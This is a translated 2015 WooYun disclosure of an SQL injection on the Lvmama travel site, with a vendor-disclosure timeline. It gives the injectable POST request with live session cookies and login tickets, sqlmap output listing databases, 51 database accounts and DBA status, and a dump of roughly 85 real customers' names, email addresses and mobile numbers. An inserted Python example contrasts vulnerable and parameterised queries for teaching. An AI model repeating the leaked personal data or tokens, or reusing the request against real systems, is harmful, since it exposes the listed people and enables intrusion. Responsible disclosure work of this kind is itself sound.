
Vulnerability summary

Defect ID: wooyun-2015-0149508

Title: Lvmama Tourism (驴妈妈旅游网) SQL injection (affects 400,000 users' information / email addresses / mobile numbers)

Vendor: 驴妈妈旅游网 (Lvmama Tourism)

Author: Xmyth_Xi2oMin9

Submitted: 2015-10-26 11:47

Fixed: 2015-12-10 14:58

Published: 2015-12-10 14:58

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-26: Details sent to the vendor, awaiting vendor handling
2015-10-26: Vendor confirmed; details visible to the vendor only
2015-11-05: Details opened to core white hats and domain experts
2015-11-15: Details opened to regular white hats
2015-11-25: Details opened to intern white hats
2015-12-10: Details opened to the public

Summary:

Lvmama Tourism (驴妈妈旅游网), founded in 2008, is a new-model B2C online travel e-commerce site in China and a platform for booking independent-travel products and for travel information. From the start, Lvmama positioned itself in the market as an independent-travel service provider; over several years it has built an online travel business that, alongside package tours, covers bus-based independent travel, long-haul tours and outbound travel, giving travelers one-stop convenience for their trips.

Details:

POST /zt/promo/jingpai/ HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.lvmama.com/zt/promo/jingpai/?losc=018454
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.lvmama.com
Content-Length: 22
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: uid=wKgKcFYog5wUhDoMAwSLAg==; lvsessionid=6bae512d-cab8-44b0-8484-dbf3dc91a2f7_19599120; PHPSESSID=8jeoh55slod7o2kdjqapfg3ke7; cmTPSet=Y; CoreID6=80631807383514455029084&ci=90409730; JSESSIONID=D5BFF75625F84EBBE7EBC2BFDA40E347; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ; ip_location=114.252.84.34; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; bdshare_firstime=1445503292281; Rvyz72RO3yiChuCn=Nd7JknIMvMbwmiaxz91Y1fgy%2BofrdUg5iPag4kOzZdjK64Ach%2FkRy8ak7RlN7fbxI9hNU5V%2Bpo25jKklYvylU9ctWR%2F2gu0Szk6XN2ibMagh9k1kWIp28sgmU6mHWraMxXqg%2FGgUW17nleI1cK9I%2Foeo0hG3UbsB4IcQZ%2BgZVrCP1DksKEqcVdc1Zg0IKCypFEvlHUhVvQKBRY3XVkFIiotfIFb%2FyxkR1RiuImfCtOuEm%2Bco1NUKix2pJ4J45kk7wt5aGVy2dGoAzR%2F0VapeEsWFSqIHK4JxrvcIw9jKzIM28E57GpoVKovg0WY1pgPs2bsIVPmlw9P%2FZniVorYY%2BaGeW3BmiWnOOnooCM6W4VsmxUHOt4YQ7HDotUE9kIdyq%2FiAUCniceuIcDb0s%2F1MHjIElt7%2FPJjGYxDn6H4ZuRsd%2B0%2FCZ4%2FwVq5LhubjFQxuNs%2FAudtMhIm0t5%2FCMx6C0g%3D%3D147184d890600e57142c00419dd6d3b8fb734b5c; Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1445503759,1445503760,1445503762,1445503780; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1445503780; _gscu_1059159971=45503269im498j16; _gscs_1059159971=455032692ykal116|pv:14; _gscbrs_1059159971=1; CNZZDATA5199293=cnzz_eid%3D146445622-1445503813-%26ntime%3D1445503813; __utmt=1; _lvTrack_UUID=0BBAB92F-E147-4DFA-995F-4A47F94DA774; _lvTrack_sessionID=DFB3BACB-A4A2-4325-BD2A-E2E9F8ED65C7; 90409730_clogin=v=1&l=1445502908&e=1445506446307; bfd_s=30114658.29133386.1445502959660; tmc=19.30114658.23722909.1445502959661.1445504673964.1445504675949; tma=30114658.77050305.1445495717462.1445495717462.1445495717462.1; tmd=21.30114658.77050305.1445495717462.; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445495717; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445504680; bfd_g=a7fcd4ae5266aa7700004f9a00003c4b562883a2; __xsptplus443=443.2.1445502958.1445504695.9%233%7C%20http%3A%2F%2Fworldcup.lvmama.com%2F%7C%7C%7C%7C%23%23RSaZsYr184i7YqTumvZYCkmKHh5evnOM%23; __utma=30114658.629155318.1445503956.1445503956.1445503956.1; __utmb=30114658.27.10.1445503956; __utmc=30114658; __utmz=30114658.1445503956.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CASTGC=TGC-4894-9cPH1OpoQvrcbEXxkS8XlUUpRwPbuhFFichqGwy2Oqbewl5CeM; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b; unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; ticket=ST-6718-yWol7IXNAaaSHPbWfnNL; bqeRoYZ7gjxuUl7T=hc9vwzkfrdgsYDymMaiPiQctebJZNegXeCFaJD%2FVQvZtsP6M5N2Iqs2S9Treo7wvs8EHIjqpMydw1lAw9JSsfuPguLC0Qxp285oJFGb7WZsCh3YoBFnI8YwRP%2FdpJTAOBo2lQBV3fAbJ6ayATnWl1s5wplyPxRJJQ1fn0RbgFn8x0iI5kx3KP5XqaiXU%2BmYLDs%2BdZWJNNQfn1RJK022w13Jit8oTdYNJpkX8uhRZ%2Bs2tKdLd1tSamC3AYVrozJlzYy35arQryczKP9xZUwckwXIIRcK9QXJst50CFKr7n4Vk6LjPyX5qSwbzNJoPv3UGBq5OgxC7OfCC4tP55JkvUvi5%2FVWQs2bs6rbUFVuKaOWqtAsx%2B2cVDab6voEkET4Bf4kEOEqIHCWGQy2YH0dNg3ISjl%2BD20F9XjhEDrozWM4v2PBeGxkS7P4cqYfWLjyUQLNOP4JxUEXaydcct9ixsQ%3D%3D9b93b499da7723026d731c4e157b02851f6358dd

action=ajaxRecord&pid=1

[screenshot: 1.png]
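
The request above is the injection point the report exploits. As an added example that is not part of the original report and not the site's own code, the following Python models both sides of that defect: a hypothetical `ajaxRecord` lookup that concatenates the `pid` parameter into its SQL, beside a hardened version that validates the parameter against an allow-list pattern and binds it through a placeholder. It assumes `pid` is the injectable parameter (the report does not say which one sqlmap used), stands in an in-memory SQLite table for the MySQL `others.yx_users` schema shown in the proof section, and fills it with constructed rows.

```python
import re
import sqlite3

# Columns follow the `others.yx_users` schema dumped in the report; the rows are
# constructed sample data, not anything taken from the site.
SAMPLE_ROWS = [
    (1, 1445503000, "user1@example.com", "LVM00001", "13800000001", "YX0001", "k1"),
    (2, 1445503100, "user2@example.com", "LVM00002", "13800000002", "YX0002", "k2"),
    (3, 1445503200, "user3@example.com", "LVM00003", "13800000003", "YX0003", "k3"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL `others` database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE yx_users ("
        "id INTEGER PRIMARY KEY, create_time INTEGER, email TEXT, "
        "lvmama_code TEXT, mobile TEXT, yx_code TEXT, yx_key TEXT)"
    )
    conn.executemany("INSERT INTO yx_users VALUES (?, ?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def record_vulnerable(conn, pid):
    """Hypothetical `action=ajaxRecord` lookup that splices `pid` straight into SQL.

    Whatever the client sends becomes part of the statement, which is the
    defect class the report demonstrates."""
    sql = "SELECT id, email FROM yx_users WHERE id = " + pid
    return conn.execute(sql).fetchall()


def record_hardened(conn, pid):
    """Same lookup with the two controls that close the hole:
    1. the parameter must have the shape the handler expects (a short decimal id);
    2. the value is bound through a placeholder, never concatenated."""
    if not re.fullmatch(r"[0-9]{1,10}", pid):
        raise ValueError("pid must be a decimal integer")
    return conn.execute(
        "SELECT id, email FROM yx_users WHERE id = ?", (int(pid),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(record_vulnerable(db, "1"))          # one row, as intended
    print(record_vulnerable(db, "1 OR 1=1"))   # every row: the WHERE clause was rewritten
    print(record_hardened(db, "1"))            # one row
    try:
        record_hardened(db, "1 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)                # never reaches the database
```

The validation step is deliberately a strict allow-list rather than a blacklist of SQL keywords: an integer id has exactly one legitimate shape, so anything else is rejected before the database is involved, and the placeholder makes the query safe even if validation is later loosened.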

Proof:

available databases [18]:
[*] info
[*] infonews
[*] information_schema
[*] lmm_core
[*] lmm_customization
[*] lmm_guide
[*] lmm_logs
[*] lmm_lvyou
[*] lmm_message
[*] lmm_module
[*] lmm_subject
[*] lmm_subjects2
[*] lmm_weather
[*] lvmamabus
[*] minisite
[*] mysql
[*] others
[*] post_robot


Users:

database management system users [51]:
[*] 'activity'@'192.168.10.%'
[*] 'bi'@'192.168.10.77'
[*] 'bi_guide'@'192.168.10.%'
[*] 'bi_lvyou'@'192.168.10.%'
[*] 'bi_trip'@'192.168.10.%'
[*] 'customization'@'192.168.10.%'
[*] 'customization'@'192.168.30.%'
[*] 'gonglue'@'192.168.10.%'
[*] 'guide2'@'192.168.10.%'
[*] 'info'@'192.168.10.%'
[*] 'infonews'@'192.168.10.%'
[*] 'intelligence'@'%'
[*] 'lmm_core'@'192.168.10.%'
[*] 'lmm_core'@'192.168.30.%'
[*] 'lmm_core'@'192.168.30.0\\/24'
[*] 'lmm_guide'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.30.%'
[*] 'lmm_message'@'192.168.10.%'
[*] 'lmm_message'@'192.168.30.%'
[*] 'lmm_module'@'192.168.10.%'
[*] 'lmm_module'@'192.168.30.%'
[*] 'lmm_subject'@'192.168.10.%'
[*] 'lmm_subject'@'192.168.30.%'
[*] 'lmm_subjects'@'192.168.10.%'
[*] 'lmm_trip'@'192.168.10.55'
[*] 'lmm_trip'@'192.168.30.%'
[*] 'lmm_weather'@'192.168.10.%'
[*] 'lmm_weather'@'192.168.30.%'
[*] 'lv_bbs_x2'@'192.168.10.%'
[*] 'lv_bbs_x2'@'192.168.10.16'
[*] 'lv_ospeed_admin'@'192.168.10.%'
[*] 'lv_oth1058_admin'@'192.168.10.58'
[*] 'lv_others_admin'@'192.168.10.%'
[*] 'lv_others_admin'@'192.168.10.16'
[*] 'lv_spdbank_admin'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.30.%'
[*] 'lvmama_lvyou'@'192.168.50.%'
[*] 'lvmamabus'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.30.%'
[*] 'lvmamainfo'@'192.168.10.%'
[*] 'minisite'@'192.168.10.%'
[*] 'ndouser'@'192.168.10.%'
[*] 'repl'@'%'
[*] 'root'@'%'
[*] 'root'@'192.168.10.%'
[*] 'root'@'192.168.20.%'
[*] 'root'@'localhost'
[*] 'suipian'@'192.168.10.%'


current user is DBA:    True


[screenshot: 1.png]


Only part of the listing; there are many more.

| \\u6797\\u71d5\\u73b2                      | 376764085@qq.com              | 18824876464 |
| \\u6c64\\u745e\\u519b | 20134505@qq.com | 18685034481 |
| \\u8881\\u840c\\u840c | 1062846406@qq.com | 18773158473 |
| \\u8d21\\u5a77\\u5a77 | 1067409892@qq.com | 13357399729 |
| \\u9a6c\\u6625\\u4e3d | machunli1314@163.com | 15166998827 |
| \\u949f\\u6d2a\\u4e91 | 76986141@qq.com | 18850251809 |
| \\u7f57\\u7476 | melody1421@163.com | 13590985099 |
| \\u738b\\u6587\\u5f81 | 196645015@qq.com | 15083218171 |
| \\u5468\\u8587 | zhouweideye@yahoo.cn | 13775136536 |
| \\u5f90\\u82b3 | yoyotiankong@163.com | 13677012150 |
| \\u51cc\\u7f8e\\u5a1c | 67253600@qq.com | 13562917517 |
| \\u4e8e\\u4e3d\\u5a1f | 44988508@qq.com | 13764940215 |
| \\u738b\\u4f73\\u96ef | tammy_wjw@163.com | 13918907903 |
| \\u5e2d\\u5a77 | 472339707@qq.com | 18679400560 |
| \\u6c5f\\u529b | 307425235@qq.com | 13879826561 |
| \\u6731\\u4e9a\\u5a1f | juan453585972@qq.com | 15515195572 |
| \\u9648\\u5c11\\u6e05 | 281030126@qq.com | 13590658929 |
| \\u8f9c\\u8bd7\\u60c5 | gushiqing912@sina.com | 18673637725 |
| \\u8463\\u4e39 | klek18@hotmail.com | 13951672988 |
| \\u6881\\u82b8 | 14046511@qq.com | 15050523259 |
| \\u5f20\\u536b\\u82ac | gray0622@163.com | 13588336030 |
| \\u5434\\u654f\\u541b | wmj198744520@qq.com | 13917539124 |
| \\u9648\\u71d5\\u59ae | 1803261422@qq.com | 13534335511 |
| \\u590f\\u76fc\\u76fc | 1402040325@qq.com | 18768145389 |
| \\u6797\\u59d7\\u59d7 | 919689744@qq.com | 13542586180 |
| \\u5434\\u5b59\\u4e50 | wusunle211@qq.com | 18249941158 |
| \\u989c\\u52e4\\u5029 | 836709641@qq.com | 13566688226 |
| \\u6768\\u7a57\\u5a77 | girl_crazy@126.com | 13824765996 |
| \\u5411\\u96ef\\u96ef | 24834123@qq.com | 13628205955 |
| \\u9648\\u8679 | 1303383838@qq.com | 18645559168 |
| \\u9648\\u5ada\\u59ae | 446978302@qq.com | 13708738667 |
| \\u9ec4\\u8273 | 1175455871@qq.com | 13638567969 |
| \\u5434\\u96ea | 592855296@qq.com | 13858960416 |
| \\u5468\\u73fa | 54384333@qq.com | 13636564969 |
| \\u90d1\\u96ea | 447255327@qq.com | 15983790901 |
| \\u4e01\\u679c | 420818849@qq.com | 15575300887 |
| \\u90d1\\u656c | 358134819@qq.com | 18681680885 |
| \\u9648\\u96ea\\u4e39 | xuedan0920@yahoo.cn | 13631033410 |
| \\u59dc\\u5b81 | 42520263@qq.com | 13577002456 |
| \\u738b\\u6653\\u71d5 | 461921825@qq.com | 15080011292 |
| \\u4e8e\\u6db5 | 894147513@qq.com | 18353123458 |
| \\u674e\\u5a1c | 332830969@qq.com | 13077387452 |
| \\u738b\\u7f8e\\u840d | 715719174@qq.com | 13656562643 |
| \\u51af\\u96e8\\u66e6 | 1628268611@qq.com | 15106823857 |
| \\u9b4f\\u79cb\\u51e4 | 769764302@qq.com | 18354230627 |
| \\u5362\\u71d5\\u73b2 | 360731649@qq.com | 13580923988 |
| \\u8463\\u7131 | sz6dy@126.com | 13913184385 |
| \\u77f3\\u521a | 350914521@qq.com | 13973684362 |
| \\u738b\\u680c\\u7fca | 420188530@qq.com | 15858156533 |
| \\u8bb8\\u8d1e\\u59ae | xuzhzhni@163.com | 13652323463 |
| \\u848b\\u6167\\u654f | 625798557@qq.com | 18662065004 |
| \\u6c64\\u4e00\\u654f | 254647921@qq.com | 18858132501 |
| \\u5415\\u6653\\u590f | 1357392808@QQ.COM | 15807711853 |
| \\u738b\\u83b9 | xiaoxueren86@163.com | 13858865688 |
| \\u502a\\u660e | 584280023@qq.com | 13951235229 |
| \\u8521\\u67f3\\u5a77 | 3580359390@163.com | 13580359390 |
| \\u5f90\\u8d85 | menaking241@hotmail.com | 13482429267 |
| \\u53f6\\u5029 | 253746319@qq.com | 13773042868 |
| \\u676d\\u5251\\u9f99 | jianlonghang@163.com | 15895553057 |
| \\u5de8\\u664b\\u71d5 | jujinyan@hotmail.com | 13818121277 |
| \\u738b\\u971e | 635456069@qq.com | 13627655306 |
| \\u8c22\\u4e5d\\u6885 | 709368957@qq.com | 15062777505 |
| \\u5b81\\u6b23 | 121497885@qq.com | 15275599575 |
| \\u674e\\u8389\\u4e39 | 76981247@qq.com | 13838292533 |
| \\u5b81\\u6b23\\u60a6 | 183322004@qq.com | 18716339043 |
| \\u4e54\\u78ca | qiaoming2008@sina.cn | 13292055522 |
| \\u4e50\\u5a9b | 50846840@qq.com | 13811271619 |
| \\u7f57\\u6728\\u6f7a | it2222@126.com | 18998500129 |
| \\u5434\\u660e\\u73e0 | 122438985@qq.com | 15160050876 |
| \\u674e\\u96ea | 1715939757@qq.com | 18282050280 |
| \\u51b7\\u5b9c\\u6625 | elsie-lengyichun@163.com | 13917662850 |
| \\u8096\\u4e39 | 347713257@qq.com | 18744523981 |
| \\u738b\\u7490 | jelly_lue@hotmail.com | 13750830150 |
| \\u6c5f\\u4e9a\\u9a8f | 330323890@qq.com | 18673446284 |
| \\u5468\\u826f\\u666f | fjpxzlj54@163.com | 15980384361 |
| \\u675c\\u6d0b | 1102003821@QQ.COM | 18744006450 |
| \\u5f90\\u8000 | Xuyao@wgats.com | 13764463540 |
| \\u8521\\u8212\\u73b2 | 284456453@qq.com | 15059597008 |
| \\u90d1\\u91cd | zenzun36@163.com | 18675747775 |
| \\u6768\\u4e1d\\u96c1 | ysy05070966@163.com | 18929088605 |
| \\u90b5\\u6960 | 895561820@qq.com | 18254591870 |
| \\u9648\\u6dd1\\u745c | 332591935@qq.com | 13450642111 |
| \\u9ec4\\u7af9 | 53995700@qq.com | 18978639325 |
| \\u656c\\u5c0f\\u6885 | jxiaoy900907@qq.com | 15216658470 |
| \\u5f20\\u6db5\\u5a67 | xiaobai404@126.com | 13568357591 |


Database: others
Table: yx_users
[7 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| create_time | int(11) |
| email | varchar(128) |
| id | int(10) unsigned |
| lvmama_code | varchar(16) |
| mobile | varchar(16) |
| yx_code | varchar(16) |
| yx_key | varchar(8) |
+-------------+------------------+


[screenshot: 1.png]

Remediation:

I hope the reviewers will appropriately mask some of this information after the vendor confirms. Thank you for your effort.

Copyright notice: when reposting, credit the source: Xmyth_Xi2oMin9@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-10-26 14:57

Vendor reply:

thx

Latest status:

None